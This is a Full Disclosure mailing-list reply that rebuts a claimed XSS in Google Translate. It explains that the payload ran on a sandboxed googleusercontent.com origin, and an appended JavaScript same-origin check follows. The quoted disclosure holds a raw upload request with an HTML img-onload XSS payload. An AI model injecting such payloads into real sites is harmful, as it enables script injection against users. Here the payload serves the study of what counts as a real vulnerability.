Hi Francisco,

Unfortunately your disclosure is factually wrong.

Please note that even the packet you are citing says "Host: translate.googleusercontent.com" - this is not the same domain as translate.google.es (or translate.google.com), therefore, due to the JavaScript same-origin policy (https://developer.mozilla.org/en-US/docs/Web/Security/Same-origin_policy) it's a different origin. Which means that scripts executed from translate.googleusercontent.com do not have access to cookies/DOM/etc. of Google Translate main domains (translate.google.es, etc.). And there are no interesting cookies / things to do on translate.googleusercontent.com.

Given the above, as Google surely told you, you didn't find an XSS in Google Translate, you found an XSS in a sandbox domain, which was designed to allow execution of potentially hostile JavaScript code. Hey, you can even find the *.googleusercontent.com domain in Google's sandboxed domain listing: https://sites.google.com/site/bughunteruniversity/nonvuln/xss-in-sandbox-domain

Keep in mind that when doing XSS-related security research a popping out alert box tells you that you can execute code, but not if it's a vulnerability - for that you need to verify the domain (and maybe schema/port as well, depending on your case), e.g. by doing alert(document.domain) instead of alert('XSS en Google AUDIT') ;)

Cheers,
Gynvael

On Fri, Nov 27, 2015 at 10:28 AM Francisco Javier Santiago Vázquez <franciscojaviersantiagovazq...@gmail.com> wrote:

> I. VULNERABILITY
> -------------------------
> Vulnerability Cross-Site Scripting Translator Google affected by Cross-Site
> Scripting vulnerability (XSS)
> Google assumes the vulnerability.
>
>
> II. DESCRIPTION
> -------------------------
> - Firstly, go to the https://translate.google.es/?hl=es website and click on
> "Document Translate"
> - Upload the proof of concept
> - Finally, we can display the Cross-Site Scripting (XSS)
>
>
> III. PROOF OF CONCEPT
> -------------------------
> POST /translate_f HTTP/1.1
> Host: translate.googleusercontent.com
> User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:39.0) Gecko/20100101 Firefox/39.0
> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
> Accept-Encoding: gzip, deflate
> Referer: https://translate.google.es/?hl=es
> Connection: keep-alive
> Content-Type: multipart/form-data; boundary=---------------------------147452561017500
> Content-Length: 1095
>
> -----------------------------147452561017500
> Content-Disposition: form-data; name="sl"
>
> en
> -----------------------------147452561017500
> Content-Disposition: form-data; name="tl"
>
> es
> -----------------------------147452561017500
> Content-Disposition: form-data; name="js"
>
> y
> -----------------------------147452561017500
> Content-Disposition: form-data; name="prev"
>
> _t
> -----------------------------147452561017500
> Content-Disposition: form-data; name="hl"
>
> es
> -----------------------------147452561017500
> Content-Disposition: form-data; name="ie"
>
> UTF-8
> -----------------------------147452561017500
> Content-Disposition: form-data; name="text"
>
>
> -----------------------------147452561017500
> Content-Disposition: form-data; name="file"; filename="poc.html"
> Content-Type: text/html
>
> <img src="http://www.imagenesderisa.com.mx/wp-content/uploads/2015/10/imagenes-de-risa-2.jpg"
> onload="alert('XSS en Google AUDIT')"</img>
> -----------------------------147452561017500
> Content-Disposition: form-data; name="edit-text"
>
>
> -----------------------------147452561017500--
>
>
> IV. SYSTEMS AFFECTED
> -------------------------
> The vulnerability affects the Google Translator.
>
>
> VI. CREDITS
> -------------------------
> These vulnerabilities have been discovered by
> Francisco Javier Santiago Vázquez
> (https://es.linkedin.com/in/francisco-javier-santiago-v%C3%A1zquez-1b654050)
> (https://twitter.com/n0ipr0cs).
>
>
> VII. DISCLOSURE TIMELINE
> -------------------------
> Nov 02, 2015: Vulnerability acquired by Francisco Javier Santiago Vázquez, aka "n0ipr0cs"
> Nov 03, 2015: Responsible disclosure to Google Security Team.
> Nov 03, 2015: Google assumes the vulnerability
> Nov 26, 2015: Disclosure
>
>
> VIII. Links
> ------------------------
> POC:
> http://www.estacion-informatica.com/2015/11/el-no-cross-site-scripting-de-google.html
>
>
> *Francisco Javier Santiago Vázquez, Ethical Hacker and Forensic Analyst*
> <http://www.linkedin.com/pub/francisco-javier-santiago-v%C3%A1zquez/50/540/1b6>
> <http://estacioninformatica.blogspot.com.es/>
> <https://twitter.com/n0ipr0cs>
>
> _______________________________________________
> Sent through the Full Disclosure mailing list
> https://nmap.org/mailman/listinfo/fulldisclosure
> Web Archives & RSS: http://seclists.org/fulldisclosure/
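The origin check Gynvael recommends, written out as an added example that is not part of either message in this thread. It compares two URLs by scheme, host and port the way the same-origin policy does (default ports normalised) and applies it to the hosts named above; the function names and the triage helper are this example's own.

```javascript
// Added example (not from the thread): decide whether a script executing at one
// URL shares an origin, in the same-origin-policy sense, with an application URL.
// Origin = scheme + host + port; default ports are normalised so that
// "https://host" and "https://host:443" compare equal.
const DEFAULT_PORTS = { "http:": "80", "https:": "443" };

function originOf(urlString) {
  const u = new URL(urlString);
  const port = u.port || DEFAULT_PORTS[u.protocol] || "";
  return { scheme: u.protocol, host: u.hostname.toLowerCase(), port };
}

function sameOrigin(a, b) {
  const oa = originOf(a);
  const ob = originOf(b);
  return oa.scheme === ob.scheme && oa.host === ob.host && oa.port === ob.port;
}

// Triage helper (hypothetical name): given the URL where the payload actually
// executed (what alert(document.domain) plus scheme/port would have told you) and
// the application origins that hold the sessions you care about, report which of
// those origins the executing script can reach.
function classifyExecution(executedAt, protectedOrigins) {
  const reachable = protectedOrigins.filter((o) => sameOrigin(executedAt, o));
  return {
    reachable,
    verdict: reachable.length > 0
      ? "script runs inside the application's origin"
      : "script runs in a separate origin; it cannot read the listed origins' cookies or DOM",
  };
}

// The case from the thread: the file was POSTed to translate.googleusercontent.com,
// while the Translate application lives on translate.google.es / translate.google.com.
const translateOrigins = ["https://translate.google.es", "https://translate.google.com"];
const result = classifyExecution("https://translate.googleusercontent.com/translate_f", translateOrigins);
console.log(result.verdict);
```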